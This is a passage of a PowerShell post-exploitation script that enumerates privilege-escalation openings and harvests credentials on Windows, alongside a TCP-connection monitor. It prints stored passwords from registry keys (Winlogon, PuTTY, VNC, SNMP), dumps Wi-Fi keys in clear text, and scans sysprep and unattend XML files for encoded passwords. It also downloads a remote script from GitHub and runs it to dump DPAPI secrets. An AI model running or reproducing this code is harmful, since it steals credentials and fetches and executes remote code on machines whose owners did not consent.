$RottenPrivs = whoami /priv|findstr /i /C:'SeImpersonatePrivilege'|findstr /i /C:'Enabled'
$privileges0 = $RottenPrivs.split()[0] # SeImpersonatePrivilege
If($privileges0 -iMatch "^(SeImpersonatePrivilege)$")
{
Write-Host "PrivilegeName : $privileges0"
Write-Host "State : Enabled"
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
}
Else
{
Write-Host "PrivilegeName : SeImpersonatePrivilege"
Write-Host "State : Unknown"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
}
}
Else
{
# Running under administrator privileges
Write-Host " -----------------------------------------------"
Write-Host " Error: Can not be tested under admin privileges" -ForegroundColor Red
Write-Host " -----------------------------------------------"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
}
[int]$EmptySpace='0'
[int]$CountStates='0'
## [JUICY POTATO GOLDEN PRIVILEGES]
# SeShutdownPrivilege - SeChangeNotifyPrivilege <-- to test proposes (active)
Write-Host "`nVulnId : Juicy potato golden escalation [Mitre TA0004]"
Write-Host "*NOTES : Requires 2 Enabled privileges and BITS service"
Write-Host " CLSID identifier to be vulnerable to escalation"
Write-Host " -----------------------------------------------"
Start-Sleep -Milliseconds 1100
## Make sure we are NOT running
# tests under Admin privileges
If(-not($IsClientAdmin))
{
$PrivilegesNames = @(
"SeImpersonatePrivilege",
"SeAssignPrimaryTokenPrivilege"
)
# Get BITS CLSID from registry
$CLSID = (Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\BITS' -Name AppID).AppID
If([string]::IsNullOrEmpty($CLSID))
{
$CLSID = "Not Found"
}
# Privilege(s) scanner
ForEach($Privs in $PrivilegesNames)
{
$GoldenPrivs = whoami /priv|findstr /i /C:"$Privs"|findstr /i /C:'Enabled'
$privileges1 = $GoldenPrivs.split()[0] # SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilege
If($privileges1 -iMatch "^($Privs)$")
{
Write-Host " PrivilegeName : $privileges1"
Write-Host " BITS CLSID : $CLSID"
Write-Host " State : Enabled"
Write-Host " Report : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
If($EmptySpace -lt 1){echo ""} # EmptySpace trick
$CountStates++
$EmptySpace++
}
Else
{
Write-Host " PrivilegeName : $Privs"
Write-Host " BITS CLSID : $CLSID"
Write-Host " State : Unknown"
Write-Host " Report : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
If($EmptySpace -lt 1){echo ""} # EmptySpace trick
$EmptySpace++
}
}# ForEach()
# Report vuln status
If(($CountStates -eq 2) -and ($CLSID -NotMatch "^(Not Found)$"))
{
Write-Host " -----------------------------------------------"
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
}
Else
{
Write-Host " -----------------------------------------------"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
}
}
Else
{
# Running under administrator privileges
Write-Host " Error: Can not be tested under admin privileges" -ForegroundColor Red
Write-Host " -----------------------------------------------"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
}
Start-Sleep -Milliseconds 1100
## [REMOTE DESKTOP CREDENTIALS VULNERABLITY]
Write-Host "`nVulnId : RDP RDCMan vulnerability [Mitre T1021]"
If([System.IO.File]::Exists("$Env:LOCALAPPDATA\Microsoft\Remote Desktop Connection Manager\RDCMan.settings"))
{
Write-Host "FileName : RDCMan.settings"
Write-Host "Directory : %LOCALAPPDATA%\Microsoft\Remote Desktop Connection Manager"
Write-Host "FilePath : $Env:LOCALAPPDATA\Microsoft\Remote Desktop Connection Manager\RDCMan.settings"
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
}
Else
{
Write-Host "FileName : RDCMan.settings"
Write-Host "Directory : Not Found"
Write-Host "FilePath : Not Found"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
}
Start-Sleep -Milliseconds 1100
## [Plain-text Passwords in LSASS]
Write-Host "`nVulnId : Credentials in LSASS [Mitre T1003]"
$WDigest = (Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest).UseLogonCredential
If(-not([string]::IsNullOrEmpty($WDigest)))
{
If($WDigest -eq 1)
{
Write-Host "Status : Plain-text Passwords may be stored in LSASS"
Write-Host "UseLogonCredential: 1"
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
}
ElseIf($WDigest -eq 0)
{
Write-Host "Status : Plain-text Passwords are not stored in LSASS"
Write-Host "UseLogonCredential: 0"
Write-Host "VulnStatus : " -NoNewline
Write-Host "WARNING" -ForegroundColor Yellow
}
}
Else
{
Write-Host "Status : registry key not found"
Write-Host "UseLogonCredential: Unknown"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
}
Start-Sleep -Milliseconds 1300
## [Registry Plaintext Credentials]
$TightVNC = (Get-ItemProperty -Path 'HKCU:\Software\TightVNC\Server').TightVNC
$OpenSSH = (Get-ItemProperty -Path 'HKCU:\Software\OpenSSH\Agent\Keys').OpenSSH
$WinVNC3 = (Get-ItemProperty -Path 'HKCU:\Software\ORL\WinVNC3\Password"').WinVNC3
$SNMP = (Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\SNMP').SNMP
$WinVNC4 = (Get-ItemProperty -Path 'HKLM:\SOFTWARE\RealVNC\WinVNC4\password').WinVNC4
$SavedSessions = (Get-Item -Path 'HKCU:\Software\SimonTatham\PuTTY\Sessions\*').Name|ForEach-Object{$_.split("\")[5]}
$LastUsedUsername = (Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon').LastUsedUsername
$DefaultPasswords = (Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon').DefaultPassword
$AltDefaultUserNa = (Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon').AltDefaultUserName
$AltDefaultPasswo = (Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon').AltDefaultPassword
If(-not([string]::IsNullOrEmpty($LastUsedUsername)))
{
write-host "`nVulnId : Credentials in Regedit [Mitre T1552]"
Write-Host "LastUsedUsername : $LastUsedUsername"
If([string]::IsNullOrEmpty($DefaultPasswords))
{
Write-Host "DefaultPassword : Not Found"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
}
Else
{
Write-Host "DefaultPassword : $DefaultPasswords"
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
}
}
If(-not([string]::IsNullOrEmpty($AltDefaultUserNa)))
{
write-host "`nVulnId : Credentials in Regedit [Mitre T1552]"
Write-Host "AltDefaultUserName: $AltDefaultUserNa"
If([string]::IsNullOrEmpty($AltDefaultPasswo))
{
Write-Host "AltDefaultPassword: Not Found"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
}
Else
{
Write-Host "AltDefaultPassword: $AltDefaultPasswo"
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
}
}
If(-not([string]::IsNullOrEmpty($SavedSessions)))
{
ForEach($Session in $SavedSessions)
{
$Username = (Get-ItemProperty "HKCU:\Software\SimonTatham\PuTTY\Sessions\$Session").UserName
$HostName = (Get-ItemProperty "HKCU:\Software\SimonTatham\PuTTY\Sessions\$Session").Hostname
$PrivateKey = (Get-ItemProperty "HKCU:\Software\SimonTatham\PuTTY\Sessions\$Session").PublicKeyFile
$ProxyPassword = (Get-ItemProperty "HKCU:\Software\SimonTatham\PuTTY\Sessions\$Session").ProxyPassword
$ProxyUsername = (Get-ItemProperty "HKCU:\Software\SimonTatham\PuTTY\Sessions\$Session").ProxyUsername
write-host "`nVulnId : Credentials in Regedit [Mitre T1552]"
write-host "Session Name : $Session"
write-host "Hostname/IP : $HostName"
write-host "UserName : $UserName"
write-host "Proxy Username : $ProxyUsername"
write-host "Proxy Password : $ProxyPassword"
write-host "Private Key : $PrivateKey"
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
Start-Sleep -Milliseconds 400
}
}
If(-not([string]::IsNullOrEmpty($TightVNC)))
{
write-host "`nVulnId : Credentials in Regedit [Mitre T1552]"
Write-Host "TightVNC : $TightVNC"
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
}
If(-not([string]::IsNullOrEmpty($WinVNC4)))
{
write-host "`nVulnId : Credentials in Regedit [Mitre T1552]"
Write-Host "WinVNC4 : $WinVNC4"
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
}
If(-not([string]::IsNullOrEmpty($OpenSSH)))
{
write-host "`nVulnId : Credentials in Regedit [Mitre T1552]"
Write-Host "OpenSSH : $OpenSSH"
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
}
If(-not([string]::IsNullOrEmpty($WinVNC3)))
{
write-host "`nVulnId : Credentials in Regedit [Mitre T1552]"
Write-Host "WinVNC3 : $WinVNC3"
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
}
If(-not([string]::IsNullOrEmpty($SNMP)))
{
write-host "`nVulnId : Credentials in Regedit [Mitre T1552]"
Write-Host "SNMP : $SNMP"
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
}
$Creds = @()
## [Dump WiFi Credentials]
Start-Sleep -Milliseconds 1100
$Profiles = $(netsh wlan show profiles|Select-String -Pattern "All User Profile")
$parsedata = $Profiles -replace 'Profiles on interface Wi-Fi:','' -replace '\s*All User Profile\s*: ',''
ForEach($Item in $parsedata)
{
$Creds += $(netsh wlan show profiles name=$Item key=clear|findstr "SSID Content"|findstr /V "Number")
}
If(-not([string]::IsNullOrEmpty($Creds)))
{
write-host "`nVulnId : Dump WIFI Credentials [Mitre T1016]"
Write-Host " -----------------------------------------------"
$Creds -replace '"','' -replace '^(\s*)',' ' -replace ' : ',' : ' -replace 'Key Content : ','SSID password : '
Write-Host " -----------------------------------------------"
Write-Host "VulnStatus : " -NoNewline
Write-Host "WARNING" -ForegroundColor Yellow
}
Else
{
write-host "`nVulnId : Dump WIFI Credentials [Mitre T1016]"
Write-Host "Status : Unhabble to find SSID's or credentials"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
}
Start-Sleep -Milliseconds 1100
## [HardCoded credentials in XML files]
$XMLDataBase = @(
"$Env:WINDIR\unattend.xml",
"$Env:WINDIR\sysprep\sysprep.xml",
"$Env:ALLUSERSPROFILE\Groups.xml",
"$Env:WINDIR\Panther\unattend.xml",
"$Env:ALLUSERSPROFILE\Services.xml",
"$Env:ALLUSERSPROFILE\Printers.xml",
"$Env:WINDIR\system32\sysprep\sysprep.xml",
"$Env:WINDIR\Panther\Unattend\Unattend.xml"
)
ForEach($Token in $XMLDataBase)
{
If([System.IO.File]::Exists("$Token"))
{
<#
.SYNOPSIS
Author: @r00t-3xp10it
Helper - Scan for Base64 strings inside XML file
#>
$CheckBase64 = (Get-ChildItem -Path "$Token"|
Select-String -Pattern '((([A-Za-z0-9+/]{4})*)([A-Za-z0-9+/]{4}|[A-Za-z0-9+/]{3}=|[A-Za-z0-9+/]{2}==))'|
Where-Object {$_ -Match '([A-Za-z0-9+/]{10}(=|==)</\w+>|[A-Za-z0-9+/]{10}(=|==)>)$'}) # regex: '(=|==)</value>' OR '(=|==)>'
# Store the full XML syntax tag where the Base64 string was found
$FoundString = ($CheckBase64 -split(":")|Select-Object -Last 1) -replace '^\s+',''
## Get the XML line number where the Base64 string was found
$LineNumber = ($CheckBase64 -split(":")|Select-Object -Skip 2)[0]
## Get the Base64 string only to check length and empty spaces
$CheckLength = ($CheckBase64 -split(">") -split("</"))[1]
If([string]::IsNullOrEmpty($FoundString))
{
$FoundString = "Unknown"
}
Write-Host "`nVulnId : HardCoded Credentials in XML [mitre T1552]"
Write-Host "FilePath : $Token"
Write-Host "Status : XML found [scan for Base64]"
Write-Host "Base64 : " -NoNewline
Start-Sleep -Milliseconds 300
If(($CheckLength -NotMatch '\s+') -and ($CheckLength.Length -gt 10))
{
Write-Host "$FoundString" -ForegroundColor Black -BackgroundColor White
Write-Host "LineNumber : $LineNumber"
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
Start-Sleep -Milliseconds 700
}
else
{
Write-Host "Unknown"
Write-Host "VulnStatus : " -NoNewline
Write-Host "WARNING" -ForegroundColor Yellow
Start-Sleep -Milliseconds 500
}
}
Else
{
Write-Host "`nVulnId : HardCoded Credentials in XML [mitre T1552]"
Write-Host "FilePath : $Token"
Write-Host "Status : XML Not found"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
Start-Sleep -Milliseconds 400
}
}
$PIPDATABASE=''
[int]$Counter='0'
Start-Sleep -Milliseconds 1100
## [NAMED PIPES VULNERABILITY]
# Get pipe HOSTNAME\USERNAME (SKYNET\pedro) AccessControl FileSystemRights
$GetAccessControl = (Get-ChildItem -Path "\\.\pipe\"|ForEach-Object -EA SilentlyContinue GetAccessControl)
$FileSystemRights = (($GetAccessControl).Access|Where-Object{
$_.FileSystemRights -Match "FullControl" -or $_.FileSystemRights -Match "CreateFiles"}|
Select-Object -first 1|findstr /C:"FileSystemRights") -replace "FileSystemRights : ",""
If([string]::IsNullOrEmpty($FileSystemRights) -or ($FileSystemRights -Match '^(-1)'))
{
$FileSystemRights = "Unknown"
}
# Search for 5 (max) named pipes available
$SearchPipes = (Get-ChildItem -Path "\\.\pipe\").FullName
$PIPDATABASE = ($SearchPipes|Select-Object -Skip 1|Select-Object -First 5)
ForEach($NamedPipe in $PIPDATABASE)
{
$OwnerID = (($GetAccessControl).Access|Where-Object{
$_.FileSystemRights -Match "FullControl" -or $_.FileSystemRights -Match "CreateFiles"}|
Select-Object -first 1|findstr /C:"IdentityReference") -replace "IdentityReference : ",""
Write-Host "`nVulnId : NAMED Pipes vulnerability [Mitre T27308]"
Write-Host "Pipe : $NamedPipe" # \\.\pipe\lsass\
Write-Host "Owner : $OwnerID" # BUILTIN\Administradores
Write-Host "GetAccessControl : $FileSystemRights" # CreateFiles, WriteExtendedAttributes, WriteAttributes, Read, Synchronize
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
Start-Sleep -Milliseconds 400
$Counter++
}
If($SearchPipes -eq 0)
{
Write-Host "`nVulnId : NAMED Pipes vulnerability [Mitre T27308]"
Write-Host "Pipe : Not Found"
Write-Host "Owner : Unknown"
Write-Host "GetAccessControl : Unknown"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
}
$param1 = "FullControl"
## [WEAK DIRECTORY PERMISSIONS]
# Get Group Name (BUILTIN\users) in diferent languages NOTE: England, Portugal, France, Germany, Indonesia, Holland, Romania, Croacia, spain
$FindGroupUser = whoami /groups|findstr /C:"BUILTIN\Users" /C:"BUILTIN\Utilizadores" /C:"BUILTIN\Utilisateurs" /C:"BUILTIN\Benutzer" /C:"BUILTIN\Pengguna" /C:"BUILTIN\Gebruikers" /C:"BUILTIN\Utilizatori" /C:"BUILTIN\Korisnici" /C:"BUILTIN\Usuarios"|Select-Object -First 1
$param2 = $FindGroupUser.split()[0]
# Escaping backslash's and quotes.
If($param2 -Match '"' -and $param2 -Match '\\')
{
$UserGroup = $param2 -replace '\\','\\' -replace '"',''
}
ElseIf($param2 -Match '\\')
{
$UserGroup = $param2 -replace '\\','\\'
}
ElseIf($param2 -Match '"')
{
$UserGroup = $param2 -replace '"',''
}
Else
{
$UserGroup = $param2
}
[int]$CountStates='0'
# Directorys to search recursive: $Env:PROGRAMFILES, ${Env:PROGRAMFILES(x86)}, $Env:LOCALAPPDATA\Programs\
# $dAtAbAsEList = Get-ChildItem -Path "$Env:LOCALAPPDATA\Programs\" -Recurse -ErrorAction SilentlyContinue -Force|Where { $_.PSIsContainer }|Select -ExpandProperty FullName
$dAtAbAsEList = Get-ChildItem -Path "$Env:PROGRAMFILES", "${Env:PROGRAMFILES(x86)}", "$Env:LOCALAPPDATA\Programs\" -Recurse -ErrorAction SilentlyContinue -Force|Where { $_.PSIsContainer }|Select -ExpandProperty FullName
ForEach($Token in $dAtAbAsEList)
{
If(-not($Token -Match 'WindowsApps'))
{
$IsInHerit = (Get-Acl "$Token").Access.IsInherited|Select -First 1
(Get-Acl "$Token").Access|Where-Object {
$CleanOutput = $_.FileSystemRights -Match "$param1" -and $_.IdentityReference -Match "$UserGroup" ## <-- In my system the IdentityReference is: 'BUILTIN\Utilizadores'
If($CleanOutput)
{
Write-Host "`nVulnId : Weak Directory permissions [Mitre T1222]"
Write-Host "FolderPath : $Token"
Write-Host "FileSystemRights : $param1"
Write-Host "IdentityReference : $UserGroup"
Write-Host "IsInherited : $IsInHerit"
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
Start-Sleep -Milliseconds 300
$CountStates++
}
}# End of Get-Acl loop
}# End of Exclude WindowsApps
}# End of ForEach() loop
If($CountStates -eq 0)
{
Write-Host "`nVulnId : Weak Directory permissions [Mitre T1222]"
Write-Host "FolderPath : Not Found"
Write-Host "FileSystemRights : Unknown"
Write-Host "IdentityReference : Unknown"
Write-Host "IsInherited : Unknown"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
}
$WorkingPath = $pwd
## [Dump DPAPI masterkeys\blobs\loginfiles]
iwr -uri "https://raw.githubusercontent.com/r00t-3xp10it/redpill/refs/heads/main/lib/Exfiltration/Invoke-VaultCmd.ps1" -OutFile "$Env:TMP\Invoke-VaultCmd.ps1"|Unblock-File
(Get-Content -Path "$Env:TMP\Invoke-VaultCmd.ps1").Replace('Clear-Host', '#Clear-Host')|Set-Content "$Env:TMP\Invoke-VaultCmd.ps1"
cd $Env:TMP
.\Invoke-VaultCmd.ps1 -action DPAPI -Banner false
Remove-Item -Path "$Env:TMP\Invoke-VaultCmd.ps1" -Force
$host.UI.RawUI.WindowTitle = "@ScanTCP $CmdletVersion"
cd $WorkingPath
echo ""
## BaloonTip
Invoke-BallonTip
exit
}
# For LOOP [Netstat|NetTCPConnection]
For($i=1; $i -le $MaxScans; $i++)
{
If($i -eq 1)
{
## Print banner + settings OnScreen
write-host $StartBanner -ForegroundColor DarkRed
Write-Host "Capture " -ForegroundColor Red -NoNewline
Write-Host "$IP" -ForegroundColor Yellow -NoNewline
Write-Host " TCP Connections Settings`n" -ForegroundColor Red
Write-Host "Invoke : $Invoke"
Write-Host "Filter : $Filter"
Write-Host "ScanType : $ScanType"
If($ScanType -iMatch "^(automatic)$")
{
Write-Host "ScanEach : $ScanEach seconds"
}
Write-Host "MaxScans to perform : $Maxscans scans"
If($Process.IsPresent)
{
Write-Host "ProcessNames : " -NoNewline
Write-Host "$Process" -ForegroundColor Green
}
Write-Host "Create logfile : $Logfile`n"
# Press to continue
cmd /c 'pause'
Clear-Host
}
If($Invoke -iMatch "^(netstat)$")
{
# Draw script banner
$CmdLetAppl = "Netstat"
write-host $StartBanner -ForegroundColor DarkRed
Write-Host "List ESTABLISHED " -ForegroundColor Green -NoNewline
Write-Host "$IP " -ForegroundColor Yellow -NoNewline
Write-Host "TCP Connections`n" -ForegroundColor Green
If($Process.IsPresent)
{
<#
.SYNOPSIS
Author: @r00t-3xp10it
Helper - Use NETSTAT command to list established TCP connections
.NOTES
<-Invoke 'netstat'> together with <-Process> switch will
display the Process Name associated with the TCP connection
and alert user of suspicious TCP connections (yellow color)
and possible exploitable service names using the (red color)
Invoking -filter '127.0.0.1' will delete from scan report
all '127.0.0.1' strings found and is comrrespondente line
.OUTPUTS
Name Status LinkSpeed ifDesc
---- ------ --------- ------
Wi-Fi Up 286.8 Mbps MediaTek Wi-Fi 6 MT7921 Wireless LAN Card
Ethernet Disconnected 0 bps Realtek PCIe GbE Family Controller
Proto State LocalAddress LocalPort RemoteAddress RemotePort ProcessName OwningProcess
----- ----- ------------ --------- ------------- ---------- ----------- -------------
TCP Established 127.0.0.1 5141 127.0.0.1 58600 AcerQAAgent 4296
TCP Established 127.0.0.1 49669 127.0.0.1 49670 ADESv2Svc 4216
TCP Established 127.0.0.1 49670 127.0.0.1 49669 ADESv2Svc 4216
TCP Established 127.0.0.1 49672 127.0.0.1 49673 AcerSysMonitorService 8120
TCP Established 127.0.0.1 49673 127.0.0.1 49672 AcerSysMonitorService 8120
TCP Established 127.0.0.1 58600 127.0.0.1 5141 AQAUserPS 24772
TCP Established 127.0.0.1 58641 127.0.0.1 58995 AcerGAICameraW 25144
TCP Established 127.0.0.1 58995 127.0.0.1 58641 AcerPixyService 16616
TCP Established 192.168.1.5 49457 4.207.247.137 443 svchost 4804
TCP Established 192.168.1.5 63677 185.199.110.133 443 opera 16944
TCP Established 192.168.1.5 63678 185.199.108.154 443 opera 16944
TCP Established 192.168.1.5 63692 140.82.113.25 443 opera 16944
TCP Established 192.168.1.5 63659 52.123.129.14 443 MpDefenderCoreService 22416
-|Scan [4:10]|-
#>
# Retrieve ProcessName(s)
Invoke-ProcessTCPwarnings
Write-Host "-|Scan[" -NoNewline
Write-Host "${i}" -ForegroundColor Yellow -NoNewline
Write-Host ":" -NoNewline
Write-Host "${MaxScans}" -ForegroundColor Red -NoNewline
Write-Host "]$(Get-Date -Format 'HH:mm:ss')|-"
}
Else
{
<#
.SYNOPSIS
Author: @r00t-3xp10it
Helper - Use NETSTAT command to list established TCP connections
.NOTES
Invoking -filter '127.0.0.1' will delete from scan report
all '127.0.0.1' strings found and full comrrespondente line
.OUTPUTS
Proto Local Address Foreign Address State PID
----- ------------- --------------- ----------- ---
TCP 127.0.0.1:5141 127.0.0.1:58600 ESTABLISHED 4296
TCP 127.0.0.1:49669 127.0.0.1:49670 ESTABLISHED 4216
TCP 127.0.0.1:49670 127.0.0.1:49669 ESTABLISHED 4216
TCP 127.0.0.1:49672 127.0.0.1:49673 ESTABLISHED 8120
TCP 127.0.0.1:49673 127.0.0.1:49672 ESTABLISHED 8120
TCP 127.0.0.1:58600 127.0.0.1:5141 ESTABLISHED 24772
TCP 127.0.0.1:58641 127.0.0.1:58995 ESTABLISHED 25144
TCP 127.0.0.1:58995 127.0.0.1:58641 ESTABLISHED 16616
TCP 192.168.1.5:49457 4.207.247.137:443 ESTABLISHED 4804
TCP 192.168.1.5:63025 140.82.114.26:443 ESTABLISHED 16944
TCP 192.168.1.5:63039 13.69.239.68:443 ESTABLISHED 18212
-|Scan[2:8]|-
#>
## Use netstat command to display established TCP connections
# Findstr /V "\[ 0.0.0.0" - deletes from netstat output all IPV6 addr found.
$NetStats = Netstat -ano|findstr "ESTABLISHED"|findstr /V "$Filter"
# Display results OnScreen
Write-Host " Proto Local Address Foreign Address State PID" -ForegroundColor Yellow
Write-Host " ----- ------------- --------------- ----------- ---"
echo $NetStats
echo ""
Write-Host "-|Scan[" -NoNewline
Write-Host "${i}" -ForegroundColor Yellow -NoNewline
Write-Host ":" -NoNewline
Write-Host "${MaxScans}" -ForegroundColor Red -NoNewline
Write-Host "]$(Get-Date -Format 'HH:mm:ss')|-"
# Append to logfile?
If($Logfile.IsPresent)
{
echo "`n Proto Local Address Foreign Address State PID" >> $LogName
echo " ----- ------------- --------------- ----------- ---" >> $LogName
echo $NetStats >> $LogName
}
}
# Scan Type (manual|automatic)
Invoke-ScanTypes
## Do not clear screen if $i ...
# reachs the max of MaxScans ($MaxScans)
If($i -NotMatch "$MaxScans")
{
Clear-Host
}
}
Elseif($Invoke -iMatch "^(NetTCPConnection)$")
{
<#
.SYNOPSIS
Author: @r00t-3xp10it
Helper - Use Get-NetTCPConnection CmdLet to list established TCP connections
.NOTES
-Invoke 'NetTCPConnection' together with -Process switch will
display the ProcessName associated with the TCP connection
Invoking -filter '127.0.0.1' will delete from scan report
all '127.0.0.1' strings found and is comrrespondente line
.OUTPUTS
Name Status LinkSpeed ifDesc
---- ------ --------- ------
Wi-Fi Up 286.8 Mbps MediaTek Wi-Fi 6 MT7921 Wireless LAN Card
Ethernet Disconnected 0 bps Realtek PCIe GbE Family Controller
TCP State LocalAddress LocalPort RemoteAddress RemotePort HostName ProcessName OwningProcess
--------- ------------ --------- ------------- ---------- -------- ----------- -------------
Established 192.168.1.5 62082 140.82.113.26 443 lb-140-82-113-26-iad.github.com opera 776
Established 127.0.0.1 60919 127.0.0.1 58995 Skynet AcerGAICameraW 6880
Established 127.0.0.1 60904 127.0.0.1 5141 Skynet AQAUserPS 3404
Established 127.0.0.1 58995 127.0.0.1 60919 Skynet AcerPixyService 4548
Established 127.0.0.1 49673 127.0.0.1 49672 Skynet AcerSysMonitorService 8560
Established 127.0.0.1 49672 127.0.0.1 49673 Skynet AcerSysMonitorService 8560
Established 127.0.0.1 49670 127.0.0.1 49669 Skynet ADESv2Svc 4508
Established 127.0.0.1 49669 127.0.0.1 49670 Skynet ADESv2Svc 4508
Established 192.168.1.5 49412 4.207.247.139 443 svchost 4964
Established 127.0.0.1 5141 127.0.0.1 60904 Skynet AcerQAAgent 4576
-|Scan[5:20]|-
#>
$CmdLetAppl = "NetTCPConnection"
write-host $StartBanner -ForegroundColor DarkRed
Write-Host "List ESTABLISHED " -ForegroundColor Green -NoNewline
Write-Host "$IP " -ForegroundColor Yellow -NoNewline
Write-Host "TCP Connections" -ForegroundColor Green
# Get NetAdaptor settings
Get-NetAdapter|Select-Object Name,Status,LinkSpeed,ifDesc|
Format-Table -AutoSize|Out-String -Stream|Select-Object -First 5
If($Process.IsPresent)
{
# List established TCP connections
$NetStats = Get-NetTCPConnection -State ESTABLISHED|
Select-Object -Property @{name='TCP State';expression={'Established'}},LocalAddress,LocalPort,RemoteAddress,RemotePort,@{name='HostName';expression={(Resolve-DnsName $_.RemoteAddress).NameHost}},@{Name="ProcessName";Expression={(Get-Process -PId $_.OwningProcess).ProcessName}},OwningProcess|
Where-Object{$_ -iNotMatch "($Filter)"}
# BallonTip TCP connection warnings
If($WarnMeOf -iNotMatch "^(NULL)$")
{
<#
.NOTES
pops up one ballontip warning that one TCP connection
related with process name was found active on device
#>
ForEach($_Processes_ in $NetStats)
{
# Get all process names from $NetStats variable
$ProcName = ($_Processes_|findstr /C:"ProcessName") -replace 'ProcessName : ',''
# Invoke BallonTip warning that process name has found connecting with TCP
If($ProcName -iMatch "($WarnMeOf|LDAPS|IMAPS|RDP|Mstsc|smb|netbios|Lsass|telnet|ssh|ssl|vnc|System)")
{
# Get Ports from $NetStats variable OwningProcess
$LocalPor = ($_Processes_|findstr /C:"LocalPort") -replace 'LocalPort : ',''
$RemotePo = ($_Processes_|findstr /C:"RemotePort") -replace 'RemotePort : ',''
$ProcPPID = ($_Processes_|findstr /C:"OwningProcess") -replace 'OwningProcess : ',''
Invoke-BallonTipWarnings
}
} # End of ForEach()
}
# ProcessName detail Info
If($ProcessInfo.IsPresent)
{
<#
.OUTPUTS
ProcessName Description DLLs Loaded
----------- ----------- -----------
opera Opera GX Internet Browser opera.exe ntdll.dll KERNEL32.DLL KERNELBASE.dll opera_elf.dll bcryptprimitives.dll opera_bro...
AQAUserPS
AcerPixyService
AcerGAICameraW Acer GAI Camera Windows AcerGAICameraW.exe ntdll.dll KERNEL32.DLL KERNELBASE.dll USER32.dll win32u.dll WINHTTP.dll A...
AcerSysMonitorService
AcerSysMonitorService
ADESv2Svc
ADESv2Svc
svchost
AcerQAAgent
#>
Start-Sleep -Seconds 1
# PROCESSES INFO TABLE
$Proctable = New-Object System.Data.DataTable
$Proctable.Columns.Add("ProcessName")|Out-Null
$Proctable.Columns.Add("Description")|Out-Null
$Proctable.Columns.Add("DLLs Loaded")|Out-Null
ForEach($tetrys in $NetStats)
{
# Get PID of all processes found in $Netstats
$PPID = ($tetrys|findstr /C:"OwningProcess") -replace 'OwningProcess : ',''
$DLLSLoaded = (Get-Process -Id $PPID|Select *).modules.modulename
$ProcNa = (Get-Process -Id $PPID).Name
$ProcDe = (Get-Process -Id $PPID).Description
$ProcId = (Get-Process -Id $PPID).EnableRaisingEvents
## Adding values to output DataTable!
$Proctable.Rows.Add("$ProcNa", ## name
"$ProcDe", ## description
"$DLLSLoaded" ## DLLS LOADED
)|Out-Null
} # End of ForEach()
}
# Append to logfile?
If($Logfile.IsPresent)
{
echo $NetStats|Format-Table -AutoSize >> $LogName
If($ProcessInfo.IsPresent)
{
echo $Proctable|Format-Table -AutoSize >> $LogName
}
}
}
Else
{
# List established TCP connections only
$NetStats = Get-NetTCPConnection -State ESTABLISHED|
Select-Object -Property @{name='TCP State';expression={'Established'}},LocalAddress,LocalPort,RemoteAddress,RemotePort,@{name='HostName';expression={(Resolve-DnsName $_.RemoteAddress).NameHost}},OwningProcess|
Where-Object{$_ -iNotMatch "($Filter)"}
# Append to logfile?
If($Logfile.IsPresent)
{
echo $NetStats|Format-Table -AutoSize >> $LogName
}
}
echo ""
# Display results OnScreen
$NetStats|Format-Table -AutoSize|Out-String -Stream|ForEach-Object {
$stringformat = If($_ -iMatch "(ftp|TeamViewer|svchost|Csrss|backgroundTaskHost|http|spoolsv|taskhostw|PhoneExperienceHost)")
{
@{ 'ForegroundColor' = 'Yellow' }
}
